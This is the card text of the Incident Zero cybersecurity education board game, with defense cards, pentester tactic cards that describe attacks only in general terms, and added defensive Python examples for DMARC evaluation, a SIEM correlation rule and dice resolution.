Vector index rows: SOCIAL_ENGINEERING, WEB_EXPLOIT, CREDENTIAL_ABUSE, MALWARE, NETWORK, DATA_EXFIL

Vectors: plural convention (v2.2): Most defenses list a single vector. A few list two (marked "Vectors:"). A dual-tagged defense counts as a vector match for either listed vector.
Tier: BASIC (10 Budget) Vector: SOCIAL_ENGINEERING
Deploy SPF (Sender Policy Framework), DKIM (DomainKeys Identified Mail), and DMARC (Domain Message Authentication, Reporting & Conformance) to prevent email spoofing.
Effect: Blocks phishing emails claiming to be from your domain. Requires attackers to find alternative vectors.
Used Against: T-01 (Phishing Campaign)
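The card names three controls but the Effect line only makes sense once you see how a receiving mail server combines them: SPF and DKIM each produce a pass/fail result, and DMARC decides whether either result is "aligned" with the visible From: domain and what to do if neither is. The following is an added example, not part of the Incident Zero bundle. The DMARC record is a constructed sample for the fictional domain example.com; SPF and DKIM results are passed in as a verifier would have produced them (no DNS lookups or signature checks are performed), and the organizational-domain rule is simplified to the last two labels, which real receivers replace with the Public Suffix List.

```python
"""Added example (not from the Incident Zero bundle): DMARC evaluation logic,
showing how SPF, DKIM and DMARC fit together at the receiving mail server."""

# Constructed sample of the TXT record published at _dmarc.example.com:
# reject on failure, quarantine for subdomains, strict DKIM / relaxed SPF alignment
SAMPLE_DMARC_RECORD = (
    "v=DMARC1; p=reject; sp=quarantine; adkim=s; aspf=r; "
    "rua=mailto:dmarc-reports@example.com"
)


def parse_dmarc(record):
    """Split 'tag=value; tag=value' into a dict and apply the RFC 7489 defaults
    (relaxed alignment when adkim/aspf are absent)."""
    tags = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        key, _, value = part.partition("=")
        tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1" or "p" not in tags:
        raise ValueError("not a valid DMARC record: needs v=DMARC1 and a p= tag")
    tags.setdefault("adkim", "r")
    tags.setdefault("aspf", "r")
    return tags


def org_domain(domain):
    """Organizational domain, simplified to the last two labels (assumption:
    a real receiver consults the Public Suffix List so that e.g. co.uk works)."""
    return ".".join(domain.lower().rsplit(".", 2)[-2:])


def aligned(auth_domain, from_domain, mode):
    """DMARC identifier alignment: strict ('s') needs an exact match,
    relaxed ('r') needs the same organizational domain."""
    if mode == "s":
        return auth_domain.lower() == from_domain.lower()
    return org_domain(auth_domain) == org_domain(from_domain)


def evaluate_dmarc(record, from_domain, spf_result, spf_domain, dkim_result, dkim_domain):
    """Return ('pass', None) or ('fail', requested_policy).

    spf_domain is the RFC5321.MailFrom domain that SPF was checked against;
    dkim_domain is the d= tag of the signature that verified. DMARC passes
    when at least one mechanism both passed and aligns with the From: domain,
    which is why a spoofer with valid SPF for their own domain still fails."""
    tags = parse_dmarc(record)
    spf_ok = spf_result == "pass" and aligned(spf_domain, from_domain, tags["aspf"])
    dkim_ok = dkim_result == "pass" and aligned(dkim_domain, from_domain, tags["adkim"])
    if spf_ok or dkim_ok:
        return ("pass", None)
    policy = tags["p"]
    # sp= overrides p= when the From: domain is a subdomain of the record's domain
    if from_domain.lower() != org_domain(from_domain) and "sp" in tags:
        policy = tags["sp"]
    return ("fail", policy)
```

The first assertion in the test is the case the card's Effect line describes: mail that claims to be From: example.com but was sent from an unrelated domain with its own passing SPF still fails DMARC and is rejected.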
Tier: BASIC (10 Budget) Vector: SOCIAL_ENGINEERING
Conduct phishing awareness training for all staff. Teach recognition of suspicious links, sender spoofing, urgency tactics, and credential harvesting attempts.
Effect: Reduces successful phishing rate by 70-80%. Users become your first line of defense.
Used Against: T-01, T-02 (Phishing, Watering Hole)
Tier: BASIC (10 Budget) Vector: WEB_EXPLOIT
Deploy automated Windows Update management across all systems. Establish patch deployment timelines (critical = 48 hours, high = 2 weeks).
Effect: Closes browser and kernel vulnerabilities. Prevents watering hole and exploit kit attacks.
Used Against: T-02 (Watering Hole), T-05 (Privilege Escalation)
Tier: BASIC (10 Budget) Vector: NETWORK
Deploy perimeter firewall rules to block unauthorized outbound protocols. Default-deny for unusual ports and known malware C2 domains.
Effect: Prevents early-stage lateral movement and C2 beaconing. Slows attacker reconnaissance.
Used Against: T-04 (Lateral Movement), T-09 (C2 Beaconing)
Tier: BASIC (10 Budget) Vector: MALWARE
Deploy centralized log aggregation (syslog, Splunk, ELK). Forward Windows Event Logs, firewall logs, DNS queries, and proxy logs to central SIEM.
Effect: Makes local log tampering difficult. Provides investigative visibility into attacker activities. Foundation for threat hunting.
Used Against: T-07, T-08 (Persistence attacks)
Tier: BASIC (10 Budget) Vector: MALWARE
Deploy signature-based antivirus across all endpoints. Enable automatic definition updates (daily). Configure real-time file and email scanning.
Effect: Catches known malware variants. Does not detect zero-day or polymorphic malware. Useful as part of defense-in-depth.
Used Against: T-05, T-07, T-08 (Malware-based attacks)
Tier: BASIC (10 Budget) (v2.2 — retiered from ELITE; 3-2-1 backups are fundamental hygiene) Vector: MALWARE
Implement 3-2-1 backup strategy: 3 copies of data, 2 different storage types, 1 offsite copy. Test restore procedures quarterly.
Effect: Enables rapid recovery from ransomware. Ensures data availability even if primary systems are compromised. Critical for business continuity.
Used Against: T-07, T-08, T-10, T-11, T-12 (Persistence and exfil attacks)
Tier: BASIC (10 Budget) (v2.2 — retiered from ELITE and renamed from "Incident Response Playbooks" to avoid confusion with the Hardening "Create Playbook" action) Vector: NETWORK
Establish an incident response program with detailed runbooks for common scenarios: malware infection, data exfiltration, ransomware, insider threats, supply chain compromise. Include roles, responsibilities, communication plans.
Effect: Enables faster, more coordinated response when incidents occur. Reduces confusion during high-pressure situations. Improves incident containment and recovery time.
Used Against: T-09, T-10, T-11, T-12 (All C2 & Exfil attacks)
Tier: ADVANCED (15 Budget) Vector: CREDENTIAL_ABUSE
Deploy MFA for all remote access (VPN, RDP), email, and admin portals. Use authenticator apps or hardware tokens (not SMS).
Effect: Makes compromised credentials useless without the second factor. Blocks credential stuffing attacks.
Used Against: T-03 (Compromised Credentials), T-06 (Mimikatz)
Tier: ADVANCED (15 Budget) Vector: MALWARE
Deploy EDR agent on all endpoints. Monitor process execution, file creation, registry modifications, and memory injection attempts. Enable behavioral analytics.
Effect: Detects living-off-the-land attacks (PowerShell, cmd, scheduled tasks). Provides deep visibility into attack progression.
Used Against: T-05 (Priv Esc), T-07, T-08 (Persistence)
Tier: ADVANCED (15 Budget) Vector: NETWORK
Implement VLANs and microsegmentation to separate user workstations from servers. Deploy firewall rules between segments. Implement zero-trust network access controls.
Effect: Prevents lateral movement via SMB and other internal protocols. Limits blast radius of compromise.
Used Against: T-04 (Lateral Movement), T-06 (Credential Dumping spread)
Tier: ADVANCED (15 Budget) Vector: NETWORK
Create SIEM rules to detect attack patterns: failed login spikes, privilege escalation attempts, unusual process creation, scheduled task creation, and data exfil indicators.
Effect: Correlates events across logs to detect multi-step attacks. Enables faster investigation and response.
Used Against: T-04, T-05, T-06, T-07, T-08, T-09 (Detection across entire chain)
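Two of the patterns this card lists, a failed-login spike and scheduled-task creation, are the classic pair a correlation rule chains together: neither alone is conclusive, but a spike followed by a successful logon from the same source and then a new scheduled task on that host is the T-04/T-07 sequence. The following is an added example, not part of the Incident Zero bundle, run over a handful of constructed Windows-style log lines. The event IDs are the real Windows Security log IDs (4625 failed logon, 4624 successful logon, 4698 scheduled task created); the hosts, users, IPs and task names are invented.

```python
"""Added example (not from the Incident Zero bundle): a SIEM-style correlation
rule of the kind D-10 describes, over constructed log lines."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (one event per line, key=value fields)
SAMPLE_LOGS = """\
2026-01-10T09:00:01 host=WS01 event=4625 user=alice src=10.0.0.5
2026-01-10T09:00:08 host=WS01 event=4625 user=alice src=10.0.0.5
2026-01-10T09:00:15 host=WS01 event=4625 user=alice src=10.0.0.5
2026-01-10T09:00:21 host=WS01 event=4625 user=alice src=10.0.0.5
2026-01-10T09:00:30 host=WS01 event=4625 user=alice src=10.0.0.5
2026-01-10T09:00:44 host=WS01 event=4624 user=alice src=10.0.0.5
2026-01-10T09:03:10 host=WS01 event=4698 user=alice src=10.0.0.5 task=Updater
2026-01-10T09:05:00 host=SRV01 event=4698 user=svc-backup src=10.0.0.9 task=NightlyBackup
2026-01-10T10:00:00 host=WS02 event=4625 user=bob src=10.0.0.7
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) event=(?P<event>\d+) "
    r"user=(?P<user>\S+) src=(?P<src>\S+)(?: task=(?P<task>\S+))?$"
)


def parse(lines):
    """Parse lines into event dicts, oldest first; unparseable lines are skipped."""
    events = []
    for line in lines.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.fromisoformat(e["ts"])
        e["event"] = int(e["event"])
        events.append(e)
    return sorted(events, key=lambda e: e["ts"])


def failed_login_spikes(events, threshold=5, window=timedelta(minutes=2)):
    """One alert per source the first time it reaches `threshold` failed
    logons (4625) inside a sliding `window`."""
    recent = defaultdict(list)
    alerted, alerts = set(), []
    for e in events:
        if e["event"] != 4625:
            continue
        q = recent[e["src"]]
        q.append(e["ts"])
        while q and e["ts"] - q[0] > window:
            q.pop(0)
        if len(q) >= threshold and e["src"] not in alerted:
            alerted.add(e["src"])
            alerts.append({"rule": "failed_login_spike", "src": e["src"], "ts": e["ts"]})
    return alerts


def correlate(events, spikes, success_window=timedelta(minutes=10),
              task_window=timedelta(minutes=15)):
    """Chain: spike -> 4624 from the same source -> 4698 on that host.
    A lone 4698 (the SRV01 backup job) produces nothing."""
    spike_ts = {a["src"]: a["ts"] for a in spikes}
    compromised = {}        # host -> time of the suspicious successful logon
    findings = []
    for e in events:
        if (e["event"] == 4624 and e["src"] in spike_ts
                and timedelta(0) <= e["ts"] - spike_ts[e["src"]] <= success_window):
            compromised[e["host"]] = e["ts"]
            findings.append({"rule": "brute_force_success", "host": e["host"],
                             "user": e["user"], "src": e["src"]})
        elif (e["event"] == 4698 and e["host"] in compromised
                and e["ts"] - compromised[e["host"]] <= task_window):
            findings.append({"rule": "persistence_after_compromise",
                             "host": e["host"], "task": e["task"]})
    return findings


def run(lines=SAMPLE_LOGS):
    """Return (spike alerts, correlated findings) for a block of log lines."""
    events = parse(lines)
    spikes = failed_login_spikes(events)
    return spikes, correlate(events, spikes)
```

On the sample, the single spike from 10.0.0.5 becomes two chained findings on WS01, while the legitimate backup task on SRV01 and bob's single failure produce nothing; the thresholds and windows are the tunable parts that D-08's "+2 hardening" flavour text is about.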
Tier: ADVANCED (15 Budget) Vector: DATA_EXFIL
Deploy DLP to monitor outbound data transfers. Classify sensitive data (customer PII, source code, trade secrets). Block or alert on unauthorized transfers.
Effect: Prevents SQL database exfiltration and bulk data theft. Detects unusual data access patterns. Enforces data security policies.
Used Against: T-10, T-11, T-12 (Data exfiltration attacks)
Tier: ADVANCED (15 Budget) Vector: CREDENTIAL_ABUSE
Deploy enterprise password vault (CyberArk, HashiCorp Vault). Enforce strong unique passwords. Implement password rotation policies for service accounts.
Effect: Prevents credential reuse attacks. Makes credential stuffing difficult. Provides audit trail for compliance and incident investigation.
Used Against: T-03, T-06 (Credential attacks)
Tier: ADVANCED (15 Budget) (v2.2 — retiered from ELITE; IPS/WAF appliances are standard mid-tier controls) Vector: WEB_EXPLOIT
Deploy network-based IPS with exploit signatures. Monitor for known CVE exploitation patterns. Configure WAF (Web Application Firewall) rules for SQL injection, XSS, and OWASP Top 10 attacks.
Effect: Blocks exploitation attempts in transit. Prevents watering hole and web exploit attacks. Most effective when combined with patching.
Used Against: T-02 (Watering Hole), T-05 (Exploits)
Tier: ADVANCED (15 Budget) (v2.2 — retiered from ELITE; community feeds like MISP/OTX are affordable) Vectors: NETWORK, DATA_EXFIL (v2.2 — dual-tagged; counts as a match for either vector)
Subscribe to threat intelligence feeds (MISP, VirusTotal, AlienVault OTX). Integrate IOCs (Indicators of Compromise) into firewall, SIEM, and proxy. Participate in information sharing communities.
Effect: Enables faster detection of known malicious IPs and domains. Identifies emerging threats targeting your industry. Reduces detection time from days to minutes.
Used Against: T-09 (C2 Beaconing), T-10, T-11, T-12 (Exfil detection)
Tier: ELITE (25 Budget) Vector: MALWARE
Establish proactive threat hunting using MITRE ATT&CK framework. Hunt for living-off-the-land techniques, anomalous processes, suspicious registry changes, and memory injection.
Effect: Finds advanced attacks that bypass signature-based detection. Detects LSASS dumping, scheduled task persistence, and registry backdoors. Reduces dwell time significantly.
Used Against: T-05, T-07, T-08 (Advanced persistence)
Tier: ELITE (25 Budget) Vector: MALWARE
Deploy memory capture and analysis (Volatility, Memoryze). Create memory images of suspicious systems. Analyze for credential dumping, injected code, and rootkits.
Effect: Detects Mimikatz attacks and credential harvesting. Reveals attacker activities hidden from disk forensics. Critical for identifying advanced persistence mechanisms.
Used Against: T-06 (Mimikatz), T-07, T-08 (In-memory attacks)
Tier: ELITE (25 Budget) Vector: NETWORK
Deploy decoy systems (fake file servers, databases, credentials) to detect lateral movement. Create canary tokens that alert when accessed.
Effect: Any access to honeypots indicates active compromise. Detects lateral movement with zero false positives. Slows attacker progress and forces reconnaissance.
Used Against: T-04 (Lateral Movement), T-06 (Credential abuse)
Tier: ELITE (25 Budget) Vector: CREDENTIAL_ABUSE
Enable Windows Credential Guard to isolate LSASS in virtualized container. Implement UEFI Secure Boot to prevent bootkit attacks. Enable TPM attestation.
Effect: Makes Mimikatz credential dumping ineffective. Prevents bootloader manipulation. Ensures firmware integrity. Blocks entire classes of early-boot attacks.
Used Against: T-06 (Mimikatz), T-07, T-08 (Persistence)
Tier: ELITE (25 Budget) Vector: MALWARE
Deploy advanced sandboxing solution (Cuckoo, Detonate, hybrid-analysis). Analyze suspicious files/URLs in isolated environments. Generate behavioral indicators and YARA rules.
Effect: Detects zero-day malware and unknown exploits. Analyzes evasion tactics. Generates detection rules for SIEM. Prevents spread of novel malware.
Used Against: T-05 (Privilege Escalation), T-07, T-08 (Malware persistence)
Tier: ELITE (25 Budget) Vector: CREDENTIAL_ABUSE
Implement zero-trust architecture: verify every access request regardless of source. Deploy device identity, user identity, and behavior analytics. Implement conditional access policies.
Effect: Eliminates implicit trust based on network location. Even compromised devices cannot access sensitive resources without proper authentication and behavior validation.
Used Against: T-03, T-06 (Credential abuse), T-04 (Lateral movement)
Tier: ELITE (25 Budget) Vector: MALWARE
Deploy container runtime security (Falco, Sysdig). Implement image scanning for vulnerabilities. Use policy enforcement engines (OPA/Gatekeeper). Implement network policies for container segmentation.
Effect: Detects container escape attempts. Prevents vulnerable images from running. Limits lateral movement within containerized environments. Critical for modern cloud applications.
Used Against: T-05 (Priv Esc), T-04 (Lateral Movement in cloud)
Tier: ELITE (25 Budget) Vector: NETWORK
Deploy enterprise SIEM (Splunk, ELK, QRadar). Centralize logs from all sources. Implement automated correlation rules, threat intelligence integration, and incident response workflows.
Effect: Provides centralized visibility into all security events. Enables rapid threat detection and investigation. Foundation for mature incident response program.
Used Against: T-04, T-06, T-07, T-08, T-09, T-10 (Detection across entire attack chain)
Note: 24 cards total. D-24 is dual-tagged (NETWORK + DATA_EXFIL) and appears in both rows, so vector-row counts sum to 25 tags across 24 cards.
Blue Team selects a Defense Card from their hand and deploys it:
- Cost: 10/15/25 Budget depending on tier
- Roll Required: None (automatic success)
- Effect: Defense immediately becomes active and counts toward Security Score
- (v2.2) Two BASIC defenses may be deployed together as a single action
When a Pentester Tactic is drawn (see Pentester Tactic Cards file), the Blue Team chooses one deployed defense to resolve it with:
Defense roll = d20 + printed defense bonus for the chosen defense (from the tactic card's bonus list) + hardening upgrades on that defense (+2 each) + relevant playbook (+3)
Success if the total is ≥ the tactic card's printed DC.
See Module: Hardening for the full resolution procedure and a worked example.
Multiple defenses work together:
- BASIC defenses are cheap but carry small printed bonuses against tactics
- ADVANCED defenses provide a good cost/effectiveness balance
- ELITE defenses are expensive but carry the largest printed bonuses against sophisticated tactics
- Layering across vectors matters: each tactic card lists which defenses earn bonuses, so broad coverage means you always have a strong defense to choose
These 24 Defense Cards are the same cards used in Incident Response module. The difference in usage:
This allows educators to:
- Use one physical deck for both modules
- Teach defense-in-depth concepts in sequence
- Show how defenses complement each other
Hardening Module: Defense Cards Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition
cards/hardening/core-deck/pentester-tactic-cards.md
Version: 2.2 - Playtest Edition Last Updated: July 2026
Pentester Tactic Cards are unique to the Hardening Module. These 8 cards represent real-world red team attack tactics that challenge the defenses the Blue Team has deployed.
During the Hardening module gameplay:
Tactic Type: Initial Access / Social Engineering Target Vectors: SOCIAL_ENGINEERING, CREDENTIAL_ABUSE Difficulty: BASIC (defeat DC 12)
Description: A pentester calls your IT helpdesk impersonating a VIP executive. They claim to be traveling without their laptop and need emergency access to critical systems. They pressure the helpdesk with urgency and authority. Can they bypass your security procedures?
Attack Details:
- Targets: User security training gaps, process enforcement
- Success indicates: Social engineering protocols aren't followed
- Blue Team rolls 1d20 to resist

Defending Defenses:
- D-02 (User Security Training): +2 bonus (staff trained to verify callers)
- D-07 (MFA): +1 bonus (second factor still required)
- D-23 (IR Program & Runbooks): +2 bonus (clear escalation procedures)

Outcome:
- Blue Team Succeeds (12+): Helpdesk follows proper verification procedures, attacker is denied
- Blue Team Fails: Attacker gains credentials or system access; Blue Team must deploy additional defenses
Teaching Point: Social engineering exploits human psychology and organizational process gaps. Technology alone cannot defend against this; training and procedures are essential.
Tactic Type: Persistence & Execution Target Vectors: MALWARE, CREDENTIAL_ABUSE Difficulty: INTERMEDIATE (defeat DC 13)
Description: A pentester delivers a payload that uses only built-in Windows tools (PowerShell, scheduled tasks, registry modifications, WMI) to maintain persistence and establish a beachhead. No suspicious files, no external C2 traffic—just legitimate Windows features weaponized. Can your defenses detect this?
Attack Details:
- Targets: Traditional antivirus, signature-based detection
- Success indicates: Blind spot in malware detection strategy
- Blue Team rolls 1d20 to detect and block

Defending Defenses:
- D-06 (Basic Antivirus): +1 bonus only (signatures don't catch living-off-the-land)
- D-08 (EDR): +3 bonus (behavioral detection catches anomalous PowerShell/schtasks)
- D-13 (Threat Hunting): +2 bonus (proactive hunting finds MITRE ATT&CK techniques)
- D-14 (Memory Forensics): +2 bonus (finds injected code in memory)

Outcome:
- Blue Team Succeeds (13+): EDR or threat hunting detects the attack before persistence is established
- Blue Team Fails: Attacker establishes persistent access; Blue Team must escalate incident response
Teaching Point: Signature-based defenses are insufficient against sophisticated attackers. Behavioral detection and proactive hunting are essential for modern threats.
Tactic Type: Privilege Escalation / Credential Access Target Vectors: CREDENTIAL_ABUSE, MALWARE Difficulty: INTERMEDIATE (defeat DC 13)
Description: A pentester with local admin privileges attempts to dump LSASS memory and extract cached domain credentials using Mimikatz. These credentials could then be used for lateral movement and privilege escalation. Can your endpoint defenses prevent this?
Attack Details:
- Targets: LSASS memory protection, credential storage hardening
- Success indicates: Weak credential protection on endpoints
- Blue Team rolls 1d20 to block the attack

Defending Defenses:
- D-07 (MFA): +1 bonus only (doesn't protect cached credentials)
- D-12 (Password Vault): +2 bonus (service accounts in vault aren't in LSASS)
- D-14 (Memory Forensics): +2 bonus (detects LSASS tampering)
- D-16 (Credential Guard & Secure Boot): +4 bonus (isolates LSASS in virtualized container—primary defense)
- D-08 (EDR): +2 bonus (alerts on suspicious LSASS access)

Outcome:
- Blue Team Succeeds (13+): Credential Guard blocks the attack or EDR detects the attempt
- Blue Team Fails: Domain credentials compromised; Blue Team loses future rolls vs. credential-based attacks (-1 penalty for remaining game)
Teaching Point: Privileged credential protection is critical. Credential Guard is the gold standard for endpoint protection. Service account password rotation and vaults prevent cached credential abuse.
Tactic Type: Lateral Movement Target Vectors: NETWORK, CREDENTIAL_ABUSE Difficulty: INTERMEDIATE (defeat DC 13)
Description: A pentester with access to one workstation attempts to move laterally across your network using SMB share enumeration, pass-the-hash attacks, and exploitation of unsecured share access. Can your network architecture and controls prevent this?
Attack Details:
- Targets: Network segmentation, share access controls
- Success indicates: Flat network with unrestricted SMB traffic
- Blue Team rolls 1d20 + architecture modifiers

Defending Defenses:
- D-04 (Firewall Rules): +1 bonus (blocks some traffic, but not SMB on internal network)
- D-09 (Network Segmentation): +3 bonus (restricts SMB traffic between segments)
- D-10 (SIEM Correlation): +2 bonus (detects lateral movement patterns)
- D-15 (Honeypots): +2 bonus (attacker triggers canary token)
- D-20 (Zero Trust Access): +3 bonus (even lateral access requires authentication)

Outcome:
- Blue Team Succeeds (13+): Network segmentation or honeypots stop the attack
- Blue Team Fails: Attacker establishes foothold on file server or domain controller; future defense deployments cost 1.5x Budget
Teaching Point: Flat networks are indefensible. Network segmentation combined with zero-trust access controls is essential. Honeypots are low-cost but highly effective deterrents.
Tactic Type: Privilege Escalation Target Vectors: MALWARE, WEB_EXPLOIT Difficulty: ADVANCED (defeat DC 14)
Description: A pentester discovers an unpatched vulnerability in a critical Windows kernel or third-party driver. They develop a local privilege escalation exploit that elevates from user to SYSTEM privileges. Can your patch management and detection systems catch this?
Attack Details:
- Targets: Patch management gaps, detection of privilege escalation
- Success indicates: Unpatched systems or poor vulnerability management
- Blue Team rolls 1d20 to patch or detect

Defending Defenses:
- D-03 (Windows Patching): +3 bonus (prevents the vulnerability from existing)
- D-05 (Log Centralization): +1 bonus (may detect unusual privilege elevation attempts)
- D-08 (EDR): +3 bonus (behavioral detection alerts on privilege escalation)
- D-13 (Threat Hunting): +2 bonus (proactive hunting finds unpatched systems)

Outcome:
- Blue Team Succeeds (14+): Patch management or EDR prevents or detects the exploit before escalation
- Blue Team Fails: Attacker gains system-level access; all subsequent attacks get +1 bonus, all defensive deployments get -1 penalty for remainder of game
Teaching Point: Patch management is one of the highest-ROI security controls. Unpatched systems are low-hanging fruit for attackers. Automated patching and vulnerability scanning are essential.
Tactic Type: Exfiltration Target Vectors: DATA_EXFIL, NETWORK Difficulty: ADVANCED (defeat DC 14)
Description: A pentester with network access attempts to exfiltrate sensitive data (customer database, source code, trade secrets) via an unmonitored channel: DNS tunneling, steganography in image uploads, or a rogue cloud storage account. Can your DLP and monitoring systems catch this?
Attack Details:
- Targets: Data loss prevention, network monitoring blind spots
- Success indicates: Unsupervised data channels or weak DLP enforcement
- Blue Team rolls 1d20 to detect and block

Defending Defenses:
- D-04 (Firewall Rules): +1 bonus (may block some exfil channels)
- D-05 (Log Centralization): +1 bonus (may reveal unusual network traffic)
- D-10 (SIEM Correlation): +2 bonus (detects anomalous data transfer patterns)
- D-11 (DLP): +4 bonus (primary defense against data exfil)
- D-22 (SIEM): +2 bonus (detects data access and transfer anomalies)
- D-24 (Threat Intelligence): +1 bonus (identifies known C2 domains/IPs)

Outcome:
- Blue Team Succeeds (14+): DLP or network monitoring detects and blocks the exfil attempt
- Blue Team Fails: Data is exfiltrated; Blue Team immediately loses the game (breach is complete)
Teaching Point: DLP and network monitoring are essential for preventing data loss. Organizations must understand their critical data flows and monitor them accordingly.
Tactic Type: Initial Access / Persistence Target Vectors: MALWARE, WEB_EXPLOIT Difficulty: ADVANCED (defeat DC 14)
Description: A pentester compromises a software vendor that your organization trusts. They inject malicious code into a legitimate update that your organization automatically deploys. The malware is signed with the vendor's legitimate certificate. Can you detect and prevent this?
Attack Details:
- Targets: Update management, supply chain security, behavioral detection
- Success indicates: Over-trust in vendor updates, poor verification procedures
- Blue Team rolls 1d20 to detect or prevent

Defending Defenses:
- D-03 (Windows Patching): +0 bonus (legitimate patch—can't be distinguished)
- D-06 (Antivirus): +1 bonus only (legitimate signature—won't help)
- D-08 (EDR): +3 bonus (behavioral detection catches malicious activity after installation)
- D-13 (Threat Hunting): +2 bonus (proactive hunting for suspicious post-update behavior)
- D-17 (Malware Sandbox): +2 bonus (detonates update before deployment)
- D-21 (Container Security): +2 bonus (prevents compromise spread in containerized environments)

Outcome:
- Blue Team Succeeds (14+): EDR or threat hunting detects malicious behavior before widespread compromise
- Blue Team Fails: Supply chain compromise spreads across organization; -2 penalty to all defense rolls for remainder of game
Teaching Point: Trust is not security. Even legitimate vendors can be compromised. A valid code signature proves only that the vendor's signing key produced the update, not that the build is clean, so signature checks alone cannot catch this card. Behavioral detection after installation, staged rollouts with a holding period before broad deployment, and verification of where a build came from (not just who signed it) are what limit the damage.
Tactic Type: Privilege Abuse / Data Exfiltration
Target Vectors: CREDENTIAL_ABUSE, DATA_EXFIL, NETWORK
Difficulty: EXPERT (defeat DC 15)
Description: A pentester acts as a disgruntled administrator with legitimate system access. They use their privileges to bypass security controls, disable logging, create backdoor accounts, and exfiltrate sensitive data. Can your controls prevent insider threats?
Attack Details:
- Targets: Administrative account monitoring, privilege abuse detection
- Success indicates: Weak monitoring of privileged access, overly broad admin permissions
- Blue Team rolls 1d20 to detect and prevent
Defending Defenses:
- D-05 (Log Centralization): +2 bonus (immutable offsite logs prevent tampering)
- D-07 (MFA): +1 bonus (makes it harder to create backdoor accounts)
- D-10 (SIEM Correlation): +2 bonus (detects unusual admin activity patterns)
- D-12 (Password Vault): +2 bonus (requires approval/audit for privileged access)
- D-20 (Zero Trust Access): +3 bonus (even admins require proper authorization for sensitive access)
- D-22 (SIEM): +3 bonus (behavioral analytics detect insider threats)
- D-23 (IR Program & Runbooks): +1 bonus (clear escalation for suspicious admin activity)
Outcome:
- Blue Team Succeeds (15+): Monitoring detects unauthorized admin activity before damage
- Blue Team Fails: Insider exfiltrates data and disables controls; Blue Team loses the game immediately and additional penalties apply to the Disaster Recovery module (if played next)
Teaching Point: Insider threats are one of the hardest problems in security. Prevention alone cannot be relied on, because the insider already holds legitimate access; detection is essential. Privileged access management (so that access is narrow and approved), behavioral monitoring, and immutable audit logs the insider cannot erase are critical.
| Card | Tactic | Vectors | Difficulty | Primary Defense |
|---|---|---|---|---|
| PT-01 | Social Engineering | SE, CA | BASIC (DC 12) | User Training |
| PT-02 | Malware Evasion | MALWARE, CA | INTERMEDIATE (DC 13) | EDR |
| PT-03 | Credential Dumping | CA, MALWARE | INTERMEDIATE (DC 13) | Credential Guard |
| PT-04 | Lateral Movement | NETWORK, CA | INTERMEDIATE (DC 13) | Network Segmentation |
| PT-05 | Privilege Escalation | MALWARE, WEB | ADVANCED (DC 14) | Patch Management |
| PT-06 | Data Exfiltration | EXFIL, NETWORK | ADVANCED (DC 14) | DLP |
| PT-07 | Supply Chain Compromise | MALWARE, WEB | ADVANCED (DC 14) | EDR/Threat Hunting |
| PT-08 | Insider Threat | CA, EXFIL, NETWORK | EXPERT (DC 15) | Privileged Access Monitoring |
Pentester Tactics are typically drawn during turns 3-4 of the 7-turn game (v2.2). This gives the Blue Team time to deploy initial defenses but creates time pressure for the final deployment phase.
When a Pentester Tactic is drawn:
Defense roll = d20 + printed defense bonus for the chosen defense (from this tactic card's bonus list) + hardening upgrades on that defense (+2 each) + relevant playbook (+3)
Notes:
- Only ONE defense's printed bonus applies per roll; there is no stacking of multiple defenses on a single roll. Layering still matters: broad coverage means a strong printed bonus is always available to choose.
- If the chosen defense is not listed on the tactic card, its printed bonus is +0 (upgrades and playbooks still apply).
- Multi-vector or multi-phase tactics (e.g., PT-09 in the expansion): resolve each vector/phase as a separate roll, choosing one defense for each roll.
See Module: Hardening for the full procedure and a worked example.
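To make the formula concrete, here is a small Python resolver, added as an illustration for this manual and not part of the Incident Zero rules files. It transcribes the printed bonus lists of PT-07 and PT-08 from the cards above, applies the one-defense rule, the +0 rule for unlisted defenses and the +2 per upgrade / +3 playbook modifiers, and reports the exact odds of beating the DC. The shape of the `deployed` dictionary (defense id to upgrade count and playbook flag) is an assumption of this example, as is the absence of any natural-1 or natural-20 rule, which the cards do not define.

```python
# Printed bonus lists transcribed from the PT-07 and PT-08 cards above.
# Other cards can be added the same way; the DC comes from the card's Difficulty line.
CARDS = {
    "PT-07": {"dc": 14, "bonuses": {"D-03": 0, "D-06": 1, "D-08": 3, "D-13": 2, "D-17": 2, "D-21": 2}},
    "PT-08": {"dc": 15, "bonuses": {"D-05": 2, "D-07": 1, "D-10": 2, "D-12": 2, "D-20": 3, "D-22": 3, "D-23": 1}},
}


def printed_bonus(card, defense):
    """Printed bonus of ONE chosen defense; a defense not on the card's list counts as +0."""
    return CARDS[card]["bonuses"].get(defense, 0)


def total_modifier(card, defense, upgrades=0, playbook=False):
    """d20 modifier: printed bonus + 2 per hardening upgrade on that defense + 3 if a relevant playbook applies."""
    return printed_bonus(card, defense) + 2 * upgrades + (3 if playbook else 0)


def success_probability(dc, modifier):
    """Probability that d20 + modifier >= dc.

    Assumption: no natural-1 / natural-20 rule, because the cards define none."""
    lowest_winning_face = dc - modifier
    winning_faces = max(0, min(20, 21 - lowest_winning_face))
    return winning_faces / 20


def resolve(card, defense, natural_roll, upgrades=0, playbook=False):
    """Apply the canonical v2.2 formula to one actual roll and report the result."""
    dc = CARDS[card]["dc"]
    total = natural_roll + total_modifier(card, defense, upgrades, playbook)
    return {"card": card, "defense": defense, "total": total, "dc": dc, "success": total >= dc}


def best_defense(card, deployed):
    """Pick the deployed defense with the highest total modifier for this card.

    `deployed` maps defense id -> (upgrades, has_playbook); this shape is an assumption of the example.
    Returns (defense, modifier, success_probability)."""
    dc = CARDS[card]["dc"]
    best = None
    for defense, (upgrades, playbook) in deployed.items():
        modifier = total_modifier(card, defense, upgrades, playbook)
        if best is None or modifier > best[1]:
            best = (defense, modifier, success_probability(dc, modifier))
    return best


if __name__ == "__main__":
    # Constructed Blue Team: D-06 plain, D-08 with one upgrade, D-13 plain, D-04 plain (unlisted on PT-07).
    blue = {"D-06": (0, False), "D-08": (1, False), "D-13": (0, False), "D-04": (0, False)}
    print(best_defense("PT-07", blue))                # ('D-08', 5, 0.6)
    print(resolve("PT-07", "D-08", 9, upgrades=1))    # total 14 vs DC 14: success
    print(resolve("PT-08", "D-04", 14))               # unlisted defense at +0: 14 vs DC 15, fails
```

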